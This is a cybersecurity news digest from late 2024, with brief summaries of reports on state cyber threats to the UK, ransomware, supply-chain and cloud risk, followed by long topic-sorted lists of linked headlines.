MI5 Chief Warns of Cyber Threats to the UK

MI5 has warned that cyber threats from Russia, China, and Iran are a growing concern for the UK. Director General Ken McCallum highlighted that these nations are heavily investing in human intelligence and advanced cyber operations targeting government information, technology, and democratic institutions. Despite expelling over 750 Russian diplomats since early 2022—the majority being spies—cyber espionage activities have intensified. MI5 and the National Cyber Security Centre anticipate an increase in cyber attacks against Western targets, particularly from Russian state actors. McCallum also emphasised the distinct threat posed by China, urging a comprehensive response to build resilience.

Walking the Tightrope Between Innovation and Risk

A recent analysis revealed that early engagement with CISOs in innovation projects leads to proactive security measures, building trust and ensuring innovation and security can coexist. Interestingly, organisations using older operational systems were shielded from recent security incidents, highlighting the inevitable trade-off between innovation and risk. The report suggests reframing the conversation to 'secure innovation' and emphasises fostering a security-first culture where employees are the first line of defence. Additionally, it stresses the importance of ensuring third-party vendors are secure, as a single compromised user could trigger a company-wide incident.

Ransomware Severity Up 68% in First Half of 2024

Cyber insurer Coalition has found that while cyber insurance claims frequency decreased slightly in the first half of 2024, ransomware severity surged by 68%, with average losses per incident reaching $353,000. Businesses with over $100 million in revenue saw a 140% increase in claims severity, averaging losses of $307,000. Ransomware, though accounting for 18% of claims, heavily drove overall severity. The report also highlighted that 40% of policyholders paid ransom demands. Additionally, organisations using outdated technologies were 2.5 times more likely to experience a claim, underscoring the need for updated security measures.

31 New Ransomware Groups in 12 Months

There has been a 30% increase in active ransomware groups over the past year, with 31 new ransomware groups identified in the last twelve months. Despite intensified law enforcement efforts, the ransomware landscape has become more fragmented. LockBit remained the most active group, accounting for 17% of victims but down 8% from the previous year due to law enforcement operations. The cyber criminal group Play doubled its victim count to become the second most active, while newcomer RansomHub accounted for 7%.

Lack of Cyber Risk Quantification Leaves Companies Financially Exposed: PwC Report

PwC's latest report reveals a significant gap in how organisations quantify cyber risks financially. Despite 89% of executives agreeing on the importance of measuring cyber risk for investment prioritisation, only 15% effectively do so. This disconnect leaves many companies financially vulnerable, with only 21% allocating cyber budgets to top risks. While 77% of executives expect cyber security budgets to increase next year, without proper quantification, funds may not address the most pressing threats. The report highlights that over half of executives see cyber security as a differentiator influencing customer trust and brand loyalty, yet a lack of effective measurement persists.

Software Supply Chain Weaknesses are Increasingly Putting Businesses at Risk

BlackBerry reports that software supply chain weaknesses are increasingly putting businesses at risk of cyber attacks, with 51% of UK IT leaders receiving notifications of attacks or vulnerabilities in the past year. Despite this, 58% trust their suppliers' cyber security policies are comparable or stronger than their own, yet less than half requested compliance confirmations. Additionally, 51% found unknown participants in their software supply chain. The consequences are significant: 71% suffered financial loss, 67% faced data and reputational damage, and 42% took over a week to recover from such attacks.

UK Businesses Cite Economic Risks and Cyber Crime as Top 2024 Concerns: Marsh McLennan

Marsh McLennan has found that economic risks and financial challenges are the top concern for UK businesses over the next 12 months, with 43% of leaders citing these issues. Cyber threats take the number two spot, where the sharp rise in attacks is seen as a growing concern, jumping from 20% in 2023 to 39% in 2024. The report highlights that business leaders plan to prioritise strengthening cyber security measures, including assessing supply chain risks and customer relationships.

Cloud Security Risks Surge as 38% of Firms Face Exposures

Cloud security risks are surging, with 38% of organisations globally facing critical exposures from a combination of security gaps. These security concerns intensify due to the "toxic cloud triad" of publicly exposed, critically vulnerable, and highly privileged cloud workloads, leaving firms vulnerable to cyber attacks resulting in disruptions, system takeovers, and data breaches. Despite the average cost of a data breach in 2024 nearing $5 million, many organisations have misconfigurations and excessive permissions; 84% possess unused or long-standing access keys; and 74% have publicly exposed storage.

Insider Threat Damage Balloons as Visibility Gaps Widen

Recent research indicates that insider threats have led to a sharp increase in cyber attacks, with 83% of organisations experiencing such incidents in 2024, up from 60% the previous year. The growing complexity of IT systems and the adoption of technologies like AI and cloud services are creating visibility gaps and escalating risks. Nearly half of the organisations reported more frequent insider attacks, with remediation costs ranging from $100,000 to $2 million per incident. Additionally, 45% take a week or longer to recover, underscoring the need for improved policies, staff training, and advanced incident-response solutions.

Sources:

https://www.darkreading.com/cyberattacks-data-breaches/it-systems-being-attacked-prepared

https://www.infosecurity-magazine.com/news/boardciso-mismatch-on-cyber/

https://www.msspalert.com/brief/mounting-phishing-attacks-enabled-by-ai-deepfakes

https://www.itsecurityguru.org/2024/10/10/ai-most-serious-threat-to-orgs-according-to-security-professionals/

https://www.inforisktoday.com/mi5-chief-warns-cyberthreats-to-uk-a-26483

https://www.darkreading.com/vulnerabilities-threats/walking-tightrope-innovation-risk

https://www.techtarget.com/searchsecurity/news/366613275/Coalition-Ransomware-severity-up-68-in-first-half-of-2024

https://www.infosecurity-magazine.com/news/new-ransomware-groups-emerge-2024/

https://www.theglobaltreasurer.com/2024/10/07/lack-of-cyber-risk-quantification-leaves-companies-financially-exposed-pwc-report-finds/

https://www.techradar.com/pro/security/software-supply-chain-weaknesses-are-increasingly-putting-businesses-at-risk

https://www.reinsurancene.ws/uk-businesses-cite-economic-risks-and-cybercrime-as-top-2024-concerns-marsh-mclennan/

https://www.infosecurity-magazine.com/news/cloud-security-risks-surge-38/

https://www.darkreading.com/threat-intelligence/insider-threat-damage-balloons-amid-evolving-cyber-environments


Governance, Risk and Compliance

Lack of Cyber Risk Quantification Leaves Companies Financially Exposed, PwC Report Finds (theglobaltreasurer.com)

Board-CISO Mismatch on Cyber Responsibility - Infosecurity Magazine (infosecurity-magazine.com)

UK businesses cite economic risks and cyber crime as top 2024 concerns: Marsh McLennan - Reinsurance News

Walking the Tightrope Between Innovation & Risk (darkreading.com)

Warning over cyber security gap in the HR sector | theHRD (thehrdirector.com)

Human Resources’ Role in Data Privacy and Cyber Security, Part I: The Basics | Ogletree, Deakins, Nash, Smoak & Stewart, P.C. - JDSupra

Your IT Systems Are Being Attacked. Are You Prepared? (darkreading.com)

Basic questions that all business leaders need to ask about IT risks: Ben Moorhouse (yorkshirepost.co.uk)

US CISO Compensation on the Rise, Report Finds | MSSP Alert

45% of cyber security leaders are stressed about budget restraints | Security Magazine

How Confidence Between Teams Impacts Cyber Incident Outcomes - Infosecurity Magazine (infosecurity-magazine.com)

The three qualities modern CISOs must have today to succeed | SC Media (scworld.com)

Cyber security is the fastest growing tech occupation in the UK – but it’s still not enough to dent the growing industry skills shortage | ITPro

CISO Paychecks: Worth the Growing Security Headaches? (darkreading.com)

From IT to Boardroom: NIS2 Reshapes Cyber Security Roles (databreachtoday.co.uk)

Organisations are taking action towards cyber resilience: PwC - Reinsurance News

Cyber risk advice for boards | Professional Security Magazine

How the increasing demand for cyber insurance is changing the role of the CISO | CSO Online

Chief risk storyteller: How CISOs are developing yet another skill | CSO Online

Ex-Uber CISO Requests New, 'Fair' Trial (darkreading.com)

Cultivating a security-first mindset: Key leadership actions - Help Net Security

What is OPSEC (operations security)? | Definition from TechTarget

Widening talent pool in cyber with on-demand contractors - Help Net Security

What Is Digital Assurance And Why It’s Crucial In Today’s Business Landscape (informationsecuritybuzz.com)

Cyber Accountability Building • Stimson Center

Facts and Stats about Cyber Security and Compliance - Security Boulevard

Many C-suite execs have lost confidence in IT, including CIOs | CIO


Threats

Ransomware, Extortion and Destructive Attacks

Why evolving cyber threats mean small businesses are ransomware targets – Computerworld

31 New Ransomware Groups Join the Ecosystem in 12 Months - Infosecurity Magazine (infosecurity-magazine.com)

Secureworks: Ransomware takedowns didn’t put off cyber criminals | Computer Weekly

Coalition Report Finds Severity of Ransomware Attacks Increased 68% in First Half of 2024 | Business Wire

White House official says insurance companies must stop funding ransomware payments (therecord.media)

Guidance for ransomware incidents | Professional Security Magazine

Ransomware double-extortion group listings peaked in 2024, report finds | SC Media (scworld.com)

Criminals Are Testing Their Ransomware in Africa (darkreading.com)

Homeland Security Blocked 500+ Ransomware Attacks Since 2021 (pymnts.com)

US Government Moves to Seize Bitcoin Amid Allegations Linked to Lazarus Group's $879 Million Crypto Heists | COINOTAG NEWS

US agency warns against crypto-hungry Trinity ransomware (cointelegraph.com)

Hackers Exploiting Veeam RCE Vulnerability to Deploy Ransomware (cybersecuritynews.com)

Ransomware Victims

Study: 92% of Healthcare Firms Hit by Cyber Attacks This Year (inforisktoday.com)

American Water shut down some of its systems following a cyber attack (securityaffairs.com)

Casio reports IT systems failure after weekend network breach (bleepingcomputer.com)

Credit monitoring and supply chain risk company hacked | CyberScoop

Medical Group Pays $240K Fine for 3 Ransomware Attacks (govinfosecurity.com)

MoneyGram: No evidence ransomware is behind recent cyber attack (bleepingcomputer.com)

Cyber expert suggests American Water cyber incident was a ransomware attack | ITPro

Phishing & Email Based Attacks

Mounting Phishing Attacks Enabled by AI, Deepfakes | MSSP Alert

Commodity and Bulk Phishing Attacks See Huge Rise | SC Media UK (scmagazineuk.com)

Microsoft: Creative Abuse of Cloud Files Bolsters BEC Attacks (darkreading.com)

Cyber crooks abuse stolen SharePoint, OneDrive, and Dropbox accounts for phishing | Cybernews

Mamba 2FA Cyber Crime Kit Strikes Microsoft Users (darkreading.com)

9 types of phishing attacks and how to identify them | CSO Online

Microsoft 365 accounts targeted by dangerous new phishing scam | TechRadar

62% of observed finance domains involved in phishing attacks | Security Magazine

Scarlett Johansson tops McAfee 2024 Celebrity Hacker Hotlist (betanews.com)

Despite Online Threats, Users Aren’t Changing Behavior (darkreading.com)

Today’s “Good Enough MFA” Should Be Phishing-Resistant - Security Boulevard

OpenAI says Chinese gang tried to phish its staff • The Register

Hurricane Helene exploited in FEMA scams, phishing | SC Media (scworld.com)

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Microsoft: Creative Abuse of Cloud Files Bolsters BEC Attacks (darkreading.com)

Cyber crooks abuse stolen SharePoint, OneDrive, and Dropbox accounts for phishing | Cybernews

9 types of phishing attacks and how to identify them | CSO Online

Other Social Engineering

9 types of phishing attacks and how to identify them | CSO Online

To Deliver Malware, Attackers Use the Phone | Intel 471

Despite Online Threats, Users Aren’t Changing Behavior (darkreading.com)

As an ethical hacker, I can’t believe the risks people routinely take when they access the internet in public (theconversation.com)

Scarlett Johansson tops McAfee 2024 Celebrity Hacker Hotlist (betanews.com)

New BeaverTail Malware Targets Job Seekers via Fake Recruiters - Infosecurity Magazine (infosecurity-magazine.com)

Hurricane Helene exploited in FEMA scams, phishing | SC Media (scworld.com)

Attackers Using VSCode to Remotely Compromise Systems | MSSP Alert

Artificial Intelligence

42.5% of fraud attempts are now driven by AI - TechCentral.ie

AI anxiety afflicts 90% of consumers and businesses - see what worries them most | ZDNET

AI Most Serious Threat to Orgs, According to Security Professionals - IT Security Guru

Mounting Phishing Attacks Enabled by AI, Deepfakes | MSSP Alert

CIOs Sound Alarm on Network Security as a Top Priority as AI Fuels New Risks and Challenges | Business Wire

Three key strategies for organisations to protect themselves from deepfakes - IT Security Guru

OpenAI details how threat actors are abusing ChatGPT | TechTarget

Hacked ‘AI Girlfriend’ Data Shows Prompts Describing Child Sexual Abuse (404media.co)

What security pros can learn from the bad information spread during this year’s election cycle | SC Media (scworld.com)

TikTok’s parent launched a web scraper that's gobbling up the world’s online data 25-times faster than OpenAI | Fortune

Over 10m Conversations Exposed in AI Call Center Hack - Infosecurity Magazine (infosecurity-magazine.com)

Risk Strategies Drawn From the EU AI Act (darkreading.com)

2FA/MFA

MFA Isn’t Failing, But It’s Not Succeeding: Why a Trusted Security Tool Still Falls Short - SecurityWeek

Today’s “Good Enough MFA” Should Be Phishing-Resistant - Security Boulevard

Why are we still talking about cyber security basics after all these years? - Security Boulevard

Malware

How Malware is Evolving: Sandbox Evasion and Brand Impersonation - Security Boulevard

This detailed malware can hack your systems and turn off your antivirus to do more damage | TechRadar

Ukrainian pleads guilty to operating Raccoon Stealer malware (bleepingcomputer.com)

Malicious Chrome Add-ons Evade Google's Updated Security (darkreading.com)

To Deliver Malware, Attackers Use the Phone | Intel 471

Two never-before-seen tools, from same group, infect air-gapped devices - Ars Technica

The “Mongolian Skimmer” Uses Unicode To Conceal Its Malicious Intent (informationsecuritybuzz.com)

Malicious packages in open-source repositories are surging | CyberScoop

Crypto-stealing malware campaign infects 28,000 people (bleepingcomputer.com)

New BeaverTail Malware Targets Job Seekers via Fake Recruiters - Infosecurity Magazine (infosecurity-magazine.com)

How macOS malware works and how to secure your Mac

Attackers Using VSCode to Remotely Compromise Systems | MSSP Alert

Bots/Botnets

New Gorilla Botnet Launches Over 300,000 DDoS Attacks Across 100 Countries (thehackernews.com)

Vulnerable APIs and Bot Attacks Costing Businesses Up to $186 Billion Annually (thehackernews.com)

Websites are losing the fight against bot attacks - Help Net Security

Unseen Threats: 95% of Advanced Bots Escape Detection on Websites | HackerNoon

Why Web Application Firewalls Are an Indispensable Part of the Security Stack (thefastmode.com)

Gorilla Botnet Launches Over 300,000 DDoS Attacks (informationsecuritybuzz.com)

Mobile

Apple iOS 18.0.1 and iPadOS 18.0.1 fix media session and passwords bugs (securityaffairs.com)

Qualcomm confirms cyber attack on Android devices that exploited a vulnerability in its chipsets (androidauthority.com)

This Trojan disguises as Google Chrome or NordVPN to wipe out your accounts | Cybernews

Android 16 could let you lock your phone down even tighter with new security features | TechRadar

Google officially kicks Kaspersky antivirus software app off the Play Store | TechRadar

Google brings better bricking to Androids, to curtail crims • The Register

3 iPhone settings I changed to thwart thieves - and what to do if your phone is stolen | ZDNET

Don’t use iPhone Mirroring at work, experts warn • The Register

Denial of Service/DoS/DDoS

Cloudflare Thwarts Largest-Ever 3.8 Tbps DDoS Attack Targeting Global Sectors (thehackernews.com)

New Gorilla Botnet Launches Over 300,000 DDoS Attacks Across 100 Countries (thehackernews.com)

DDoS attacks are on the rise, and are increasingly politically-motivated | TechRadar

New DDoS Attack Vector Discovered In CUPS, Exposing 58,000+ Vulnerable Devices Online (informationsecuritybuzz.com)

Internet of Things – IoT

How smart TVs spy on you and harvest data • The Register

You Need a Separate Network To Protect Yourself From Your Smart Devices (howtogeek.com)

New EU law touts strict cyber security requirements for all connected and IoT devices | Cybernews

14,000 medical devices are online, unsecured and vulnerable | CyberScoop

Data Breaches/Leaks

National Public Data files for bankruptcy after info leak • The Register

90% of Successful Attacks Result in Leaked Data (darkreading.com)

How Cyber Criminals Use Stolen Data to Target Companies — A Deep Dive into the Dark Web - Security Boulevard

MoneyGram says hackers stole customers' personal information and transaction data | TechCrunch

Internet Archive hacked, data breach impacts 31 million users (bleepingcomputer.com)

Marriott settles for $52M after years-long breaches • The Register

Over 240 Million US Breach Victims Recorded in Q3 - Infosecurity Magazine (infosecurity-magazine.com)

Comcast confirms 237K affected in feisty breach notification • The Register

Hezbollah data breach leads the list of the biggest cyber security events of the year - Digital Journal

China-linked group Salt Typhoon hacked US broadband providers and breached wiretap systems (securityaffairs.com)

ADT discloses second breach in 2 months, hacked via stolen credentials (bleepingcomputer.com)

MoneyGram Breach: Social Security Numbers, Bank Account Details Looted (pcmag.com)

FCC Fines T-Mobile $31.5 Million After Carrier Was Hacked 8 Times In 5 Years | Techdirt

Major breach exposes every Dutch police officer: state-sponsored actor suspected | Cybernews

Former RAC Employees Get Suspended Sentence for Data Theft - Infosecurity Magazine (infosecurity-magazine.com)

Over 10m Conversations Exposed in AI Call Center Hack - Infosecurity Magazine (infosecurity-magazine.com)

31 Million Records Exposed Online By Sports Technology Company TrackMan (informationsecuritybuzz.com)

ADT says hacker stole encrypted internal employee data after compromising business partner (therecord.media)

Leaked documents reveal British military’s secret assistance to Israeli army | Al Bawaba

Data loss incidents impact patient care - Help Net Security

Organised Crime & Criminal Actors

So far, cyber criminals appear to be just shopping around for a Telegram alternative (therecord.media)

British man arrested over hack-to-trade scheme using email password resets | ITPro

Cyber crime and harm - POST (parliament.uk)

Man pleads guilty to stealing over $37M worth of cryptocurrency (securityaffairs.com)

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Lego's website was hacked to promote a crypto scam (engadget.com)

Crypto-stealing malware campaign infects 28,000 people (bleepingcomputer.com)

US Government Moves to Seize Bitcoin Amid Allegations Linked to Lazarus Group's $879 Million Crypto Heists | COINOTAG NEWS

Man pleads guilty to stealing over $37M worth of cryptocurrency (securityaffairs.com)

FBI created a crypto token so it could watch it being abused • The Register

US agency warns against crypto-hungry Trinity ransomware (cointelegraph.com)

Insider Risk and Insider Threats

Insider Threat Damage Balloons as Visibility Gaps Widen (darkreading.com)

Despite Online Threats, Users Aren’t Changing Behaviour (darkreading.com)

Former RAC Employees Get Suspended Sentence for Data Theft - Infosecurity Magazine (infosecurity-magazine.com)

Insurance

Coalition Report Finds Severity of Ransomware Attacks Increased 68% in First Half of 2024 | Business Wire

Severity of Ransomware Attacks Rose 68% in First Half of 2024, Report Shows (claimsjournal.com)

Cyber insurance demand to rise as new threats emerge, says Bloomberg Intelligence - Reinsurance News

White House official says insurance companies must stop funding ransomware payments (therecord.media)

How the increasing demand for cyber insurance is changing the role of the CISO | CSO Online

Supply Chain and Third Parties

Software supply chain weaknesses are increasingly putting businesses at risk | TechRadar

The CrowdStrike bug and the risk of cascading failures - SiliconANGLE

What The SolarWinds Case Means For CISOs And Corporate Cyber Security (forbes.com)

ADT says hacker stole encrypted internal employee data after compromising business partner (therecord.media)

Credit monitoring and supply chain risk company hacked | CyberScoop

Cloud/SaaS

Microsoft: Creative Abuse of Cloud Files Bolsters BEC Attacks (darkreading.com)

Cyber crooks abuse stolen SharePoint, OneDrive, and Dropbox accounts for phishing | Cybernews

Mamba 2FA Cyber Crime Kit Strikes Microsoft Users (darkreading.com)

Cloud Security Risks Surge as 38% of Firms Face Exposures - Infosecurity Magazine (infosecurity-magazine.com)

Cloud Security Challenges in the Modern Era - Compare the Cloud

Hackers still prefer credentials-based techniques in cloud attacks | SC Media (scworld.com)

Microsoft 365 accounts targeted by dangerous new phishing scam | TechRadar

Social Media Accounts: The Weak Link in Organisational SaaS Security (thehackernews.com)

Outages

The CrowdStrike bug and the risk of cascading failures - SiliconANGLE

What The SolarWinds Case Means For CISOs And Corporate Cyber Security (forbes.com)

MoneyGram: No evidence ransomware is behind recent cyber attack (bleepingcomputer.com)

Encryption

Chinese hack shows why Apple is right about security backdoors (9to5mac.com)

The Wiretap: China Has Infiltrated Police Wiretap Systems (forbes.com)

The 30-year-old internet backdoor law that came back to bite | TechCrunch

Massive US security breach highlights danger of weakening encryption | Proton

Linux and Open Source

New DDoS Attack Vector Discovered In CUPS, Exposing 58,000+ Vulnerable Devices Online (informationsecuritybuzz.com)

CUPS could be abused to launch massive DDoS attack • The Register

Malicious packages in open-source repositories are surging | CyberScoop

Passwords, Credential Stuffing & Brute Force Attacks

There was a 12% increase in brute force cyber attack techniques in 2024 | Security Magazine

This Popular Security Method Doesn't Actually Stop Hackers (makeuseof.com)

Hackers still prefer credentials-based techniques in cloud attacks | SC Media (scworld.com)

Password Basics: Why Mastering Fundamentals Is Crucial (informationsecuritybuzz.com)

Why are we still talking about cyber security basics after all these years? - Security Boulevard

ADT discloses second breach in 2 months, hacked via stolen credentials (bleepingcomputer.com)

Security experts issue new guidelines as they reveal why complicated passwords put you more at risk of hacking - UNILAD

Social Media

EU Court Limits Meta's Use of Personal Facebook Data for Targeted Ads (thehackernews.com)

New EU Body to Centralize Complaints Against Facebook, TikTok, YouTube - Infosecurity Magazine (infosecurity-magazine.com)

Social Media Accounts: The Weak Link in Organisational SaaS Security (thehackernews.com)

TikTok’s parent launched a web scraper that's gobbling up the world’s online data 25-times faster than OpenAI | Fortune

The Social Media Moral Panic Is All About Confusing Risks & Harms | Techdirt

Training, Education and Awareness

MSPs must combat cyber security skills shortage with ongoing client training and support - IT Security Guru

Cyber security Is Serious — but It Doesn't Have to Be Boring (darkreading.com)

Regulations, Fines and Legislation

From IT to Boardroom: NIS2 Reshapes Cyber Security Roles (databreachtoday.co.uk)

Marriott settles for $52M after years-long breaches • The Register

Cyber Security and Resilience Bill Update (techuk.org)

UK’s cyber incident reporting law to move forward in 2025 | Computer Weekly

Influential resource on international cyber law updated for 2024 (techxplore.com)

New EU law touts strict cyber security requirements for all connected and IoT devices | Cybernews

How to secure your business before new Cyber Security and Resilience Bill (businesscloud.co.uk)

NIS2 & DORA: Staying ahead of the curve | TechRadar

EU Urged to Harmonize Incident Reporting Requirements - Infosecurity Magazine (infosecurity-magazine.com)

Risk managers call for EU cyber consistency (emergingrisks.co.uk)

EU Implements New Sanctions Framework Targeting Russian Hybrid Attacks - Novinite.com - Sofia News Agency

EU retaliates against Russian ‘hybrid warfare’ with new regulations (brusselssignal.eu)

FCC Fines T-Mobile $31.5 Million After Carrier Was Hacked 8 Times In 5 Years | Techdirt

Balancing legal frameworks and enterprise security governance - Help Net Security

Risk Strategies Drawn From the EU AI Act (darkreading.com)

Medical Group Pays $240K Fine for 3 Ransomware Attacks (govinfosecurity.com)

New EU Body to Centralize Complaints Against Facebook, TikTok, YouTube - Infosecurity Magazine (infosecurity-magazine.com)

Australia Introduces First Standalone Cyber Security Law - Infosecurity Magazine (infosecurity-magazine.com)

Models, Frameworks and Standards

Meet the shared responsibility model with new CIS resources - Help Net Security

From IT to Boardroom: NIS2 Reshapes Cyber Security Roles (databreachtoday.co.uk)

NIS2 & DORA: Staying ahead of the curve | TechRadar

DORA regulation's nuts and bolts - Help Net Security

Data Protection

Former RAC Employees Get Suspended Sentence for Data Theft - Infosecurity Magazine (infosecurity-magazine.com)

Careers, Working in Cyber and Information Security

US CISO Compensation on the Rise, Report Finds | MSSP Alert

“Brutal” cyber security job market: pros can’t land roles despite massive worker shortage | Cybernews

Cyber security is the fastest growing tech occupation in the UK – but it’s still not enough to dent the growing industry skills shortage | ITPro

Banishing Burnout: Data Security Hangs in Balance in Cyber Wellbeing Crisis - IT Security Guru

CISO Paychecks: Worth the Growing Security Headaches? (darkreading.com)

Widening talent pool in cyber with on-demand contractors - Help Net Security

Imposter syndrome in cyber security | Pen Test Partners

Cyber security careers - BBC News

Career Spotlight: The Growing Demand for OT Security Experts (databreachtoday.co.uk)

6 Simple Steps to Eliminate SOC Analyst Burnout (thehackernews.com)

UK Cyber Team seeks future security professionals | Computer Weekly

Law Enforcement Action and Take Downs

British man arrested over hack-to-trade scheme using email password resets | ITPro

Ukrainian pleads guilty to operating Raccoon Stealer malware (bleepingcomputer.com)

Global Police Track Human Traffickers in Online Crackdown - Infosecurity Magazine (infosecurity-magazine.com)

Dutch cops reveal takedown of 'largest dark web market' • The Register

Homeland Security Blocked 500+ Ransomware Attacks Since 2021 (pymnts.com)

UK to Continue Disruptive Actions Targeting Cyber Crime (databreachtoday.co.uk)

Former RAC Employees Get Suspended Sentence for Data Theft - Infosecurity Magazine (infosecurity-magazine.com)

Man pleads guilty to stealing over $37M worth of cryptocurrency (securityaffairs.com)

FBI created a crypto token so it could watch it being abused • The Register

Misinformation, Disinformation and Propaganda

US Warns of Foreign Interference in Congressional Races - Infosecurity Magazine (infosecurity-magazine.com)

What security pros can learn from the bad information spread during this year’s election cycle | SC Media (scworld.com)

Disinformation Campaign Targets Moldova Ahead Of Presidential Elections (informationsecuritybuzz.com)

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

MI5 Chief Warns of Cyber Threats to the UK - InfoRiskToday

DDoS attacks are on the rise, and are increasingly politically-motivated | TechRadar

US Warns of Foreign Interference in Congressional Races - Infosecurity Magazine (infosecurity-magazine.com)

The Attribution Dividend: Protecting Critical Infrastructure from Cyber Attacks - Stiftung Wissenschaft und Politik (swp-berlin.org)

Nation State Actors

China

MI5 Chief Warns of Cyber Threats to the UK - InfoRiskToday

US Warns of Foreign Interference in Congressional Races - Infosecurity Magazine (infosecurity-magazine.com)

The Attribution Dividend: Protecting Critical Infrastructure from Cyber Attacks - Stiftung Wissenschaft und Politik (swp-berlin.org)

The 30-year-old internet backdoor law that came back to bite | TechCrunch

China-linked group Salt Typhoon hacked US broadband providers and breached wiretap systems (securityaffairs.com)

Massive US security breach highlights danger of weakening encryption | Proton

Chinese cyber spies reportedly breached Verizon, AT&T • The Register

Illegal donations: how does dark money get into UK politics? | TBIJ (thebureauinvestigates.com)

OpenAI says it has disrupted 20-plus foreign influence networks in past year | CyberScoop

OpenAI says Chinese gang tried to phish its staff • The Register

TikTok’s parent launched a web scraper that's gobbling up the world’s online data 25-times faster than OpenAI | Fortune

Russia

MI5 Chief Warns of Cyber Threats to the UK - InfoRiskToday

DOJ seizes 41 Russian-controlled domains in cyber-espionage crackdown | CSO Online

US Warns of Foreign Interference in Congressional Races - Infosecurity Magazine (infosecurity-magazine.com)

The Attribution Dividend: Protecting Critical Infrastructure from Cyber Attacks - Stiftung Wissenschaft und Politik (swp-berlin.org)

European govt air-gapped systems breached using custom malware (bleepingcomputer.com)

EU Implements New Sanctions Framework Targeting Russian Hybrid Attacks - Novinite.com - Sofia News Agency

NCSC issues fresh alert over wave of Cozy Bear activity | Computer Weekly

Microsoft: ‘relentless’ Russia-sponsored hacking group has been disrupted - Security - CRN Australia

Russia and Iran want ‘sustained mayhem’ in UK, MI5 warns

Major breach exposes every Dutch police officer: state-sponsored actor suspected | Cybernews

EU retaliates against Russian ‘hybrid warfare’ with new regulations (brusselssignal.eu)

US, UK warn of Russian APT29 hackers targeting Zimbra, TeamCity servers (bleepingcomputer.com)

Illegal donations: how does dark money get into UK politics? | TBIJ (thebureauinvestigates.com)

Google officially kicks Kaspersky antivirus software app off the Play Store | TechRadar

Pro-Russian cyber attacks hit Belgium for fourth consecutive day (belganewsagency.eu)

Kaspersky says it's closing down its UK office and laying off dozens | TechCrunch

Pro-Ukrainian Hackers Strike Russian State TV on Putin's Birthday (thehackernews.com)

Cyber Attack Group 'Awaken Likho' Targets Russian Government with Advanced Tools (thehackernews.com)

Iran

MI5 Chief Warns of Cyber Threats to the UK - InfoRiskToday

US Warns of Foreign Interference in Congressional Races - Infosecurity Magazine (infosecurity-magazine.com)

The Attribution Dividend: Protecting Critical Infrastructure from Cyber Attacks - Stiftung Wissenschaft und Politik (swp-berlin.org)

Russia and Iran want ‘sustained mayhem’ in UK, MI5 warns

Illegal donations: how does dark money get into UK politics? | TBIJ (thebureauinvestigates.com)

Earth Simnavaz Levies Advanced Cyber Attacks Against UAE and Gulf Regions | Trend Micro (US)

North Korea

North Korean Hackers Attacking US Organisations With Unique Hacking Tools (cybersecuritynews.com)

US Government Moves to Seize Bitcoin Amid Allegations Linked to Lazarus Group's $879 Million Crypto Heists | COINOTAG NEWS

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

DDoS attacks are on the rise, and are increasingly politically-motivated | TechRadar

Hezbollah data breach leads the list of the biggest cyber security events of the year - Digital Journal

Leaked documents reveal British military’s secret assistance to Israeli army | Al Bawaba

What is spyware? And how do you protect yourself from it? | TechRadar

Tools and Controls

MFA Isn’t Failing, But It’s Not Succeeding: Why a Trusted Security Tool Still Falls Short - SecurityWeek

Lack of Cyber Risk Quantification Leaves Companies Financially Exposed, PwC Report Finds (theglobaltreasurer.com)

MSSP Market News: Survey Shows 62% of SOC Alerts are Ignored | MSSP Alert

How to protect data centres as Critical National Infrastructure (networkingplus.co.uk)

MSPs must combat cyber security skills shortage with ongoing client training and support - IT Security Guru

Cyber insurance demand to rise as new threats emerge, says Bloomberg Intelligence - Reinsurance News

CIOs Sound Alarm on Network Security as a Top Priority as AI Fuels New Risks and Challenges | Business Wire

45% of cyber security leaders are stressed about budget restraints | Security Magazine

How Confidence Between Teams Impacts Cyber Incident Outcomes - Infosecurity Magazine (infosecurity-magazine.com)

Organisations are taking action towards cyber resilience: PwC - Reinsurance News

How the increasing demand for cyber insurance is changing the role of the CISO | CSO Online

Hackers Exploiting DNS Tunneling Service To Bypass Network Firewalls (cybersecuritynews.com)

Strengthening Cyber Security with NDR and EDR integration - SiliconANGLE

Setting Up Your Network Security? Avoid These 4 Mistakes (techrepublic.com)

Cyber security professionals are turning to AI as more lose control of detection tools | ZDNET

SOC teams are frustrated with their security tools - Help Net Security

Why Web Application Firewalls Are an Indispensable Part of the Security Stack (thefastmode.com)

EU Urged to Harmonize Incident Reporting Requirements - Infosecurity Magazine (infosecurity-magazine.com)

Cyber security leaders still shaky about post-attack recovery, reports show | Healthcare IT News

How to Get Going with CTEM When You Don't Know Where to Start (thehackernews.com)

Cyber Security Is Serious — but It Doesn't Have to Be Boring (darkreading.com)

Other News

Study: 92% of Healthcare Firms Hit by Cyber Attacks This Year (inforisktoday.com)

Five percent of all Adobe Commerce and Magento stores hacked, researchers say | Cybernews

NCSC celebrates eight years as Horne blows in | Computer Weekly

UK businesses cite economic risks and cyber crime as top 2024 concerns: Marsh McLennan - Reinsurance News

Cyber security in an age of terror

Almost half of UK higher education institutions experience a cyber attack every week | TechRadar

London Fire Brigade block almost 340,000 cyber attacks (verdict.co.uk)

Healthcare's Grim Cyber Prognosis Requires Security Booster (darkreading.com)

EU Urged to Harmonize Incident Reporting Requirements - Infosecurity Magazine (infosecurity-magazine.com)

Kaspersky says it's closing down its UK office and laying off dozens | TechCrunch

Building Cyber Resilience in SMBs With Limited Resources (darkreading.com)

Middle East, Turkey See Cyber Threats Rise (darkreading.com)

Navigating the Fallout: Essential Insights for Healthcare Companies in Light of the Change Healthcare Cyber Breach | Ankura - JDSupra

Modern payment systems: An effective way to reduce your attack surface | ITPro

Illegal donations: how does dark money get into UK politics? | TBIJ (thebureauinvestigates.com)

Cyber security tips for barristers, solicitors and legal... - NCSC.GOV.UK

Government launches cyber standard for local authorities | Computer Weekly

Reasons why MSPs are the future | Microscope (computerweekly.com)

Cyber crime on the Rise in the USA: Top Retailers Investing Heavily in Cyber Security to Protect Shoppers – International Supermarket News

Vulnerability Management

Vulnerabilities

Microsoft Issues Security Update Fixing 118 Flaws, Two Actively Exploited in the Wild (thehackernews.com)

Microsoft: Windows 11 22H2 Home and Pro reached end of servicing (bleepingcomputer.com)

